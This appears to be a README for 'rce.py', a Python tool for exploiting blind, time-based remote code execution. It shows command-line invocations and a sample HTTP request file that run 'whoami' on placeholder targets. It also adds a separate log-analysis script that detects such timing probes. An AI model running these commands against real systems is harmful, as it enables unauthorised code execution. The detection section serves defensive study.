A Python-based program for time-based (blind) remote code execution (RCE). Its main objective is to extract data that is not visible in, or not returned by, the response of a vulnerable target. It uses a time-based technique: it sends a payload containing the specified command to the target and then waits for the response.
There are two ways to run it.
By Arguments:
python rce.py -t "https://www.site.com?vuln=" -c "whoami" -m "POST"
By File:
python rce.py -f "/locate/request.txt" -c "whoami"
Contents of /locate/request.txt:
POST /vuln?x= HTTP/2
Host: site.com
Content-Length: 21
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Content-Type: application/json
Referer: https://site.com/vuln?x=
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

{
product_id:"507f1f77bcf86cd799439011",
category:"bar_foo",
}
The request header file can be obtained from Burp Suite, Caido, Http Header or Tamper…
You can also pass custom headers and the data you want to send in your request:
python rce.py -t http://site.com/vuln?x= -c "whoami" -m "POST" -d 10 --Headers "['X-Host: server.example.com', 'Authorization: Bearer eyJhbG']" --json "{product_id:'507f1f77bcf86cd799439011',category:'bar_foo'}"
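Seen from the target's logs, the send-and-wait behaviour described at the top of this page appears as one client producing repeated, tightly clustered slow responses on a single endpoint. The following Python detection example is added here and is not part of rce.py or its author's code; the log layout, thresholds and function names are assumptions, and the log lines are constructed.

```python
import statistics
from collections import defaultdict

# Constructed sample lines (assumed layout): client method path status seconds
SAMPLE_LOG = """\
203.0.113.5 GET /vuln 200 0.08
203.0.113.5 GET /vuln 200 0.11
203.0.113.9 POST /vuln 200 0.09
198.51.100.7 POST /vuln 200 10.04
198.51.100.7 POST /vuln 200 0.10
198.51.100.7 POST /vuln 200 10.07
198.51.100.7 POST /vuln 200 10.02
198.51.100.7 POST /vuln 200 0.12
203.0.113.9 POST /vuln 200 4.90
203.0.113.5 GET /health 200 0.01
"""

def parse(log_text):
    """Yield (client, path, seconds) for each well-formed line; skip the rest."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        try:
            yield parts[0], parts[2], float(parts[4])
        except ValueError:
            continue

def find_timing_probes(log_text, min_excess=3.0, min_hits=3, max_spread=1.0):
    """Flag clients with repeated, near-identical delays above a path's baseline."""
    by_path = defaultdict(list)
    by_client = defaultdict(list)
    for client, path, secs in parse(log_text):
        by_path[path].append(secs)
        by_client[(client, path)].append(secs)
    findings = []
    for (client, path), times in sorted(by_client.items()):
        # Baseline is the median latency for the path across all clients.
        baseline = statistics.median(by_path[path])
        slow = [t for t in times if t - baseline >= min_excess]
        # One slow request is noise; several with the same delay is a pattern.
        if len(slow) >= min_hits and max(slow) - min(slow) <= max_spread:
            findings.append({
                "client": client, "path": path, "slow_requests": len(slow),
                "approx_delay": round(statistics.median(slow) - baseline, 1),
            })
    return findings
```

The median baseline drifts upward if probing traffic dominates an endpoint's log window, so in practice compute it over a longer history than the window being checked.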
✨by: thejolotoproject ✨
MIT

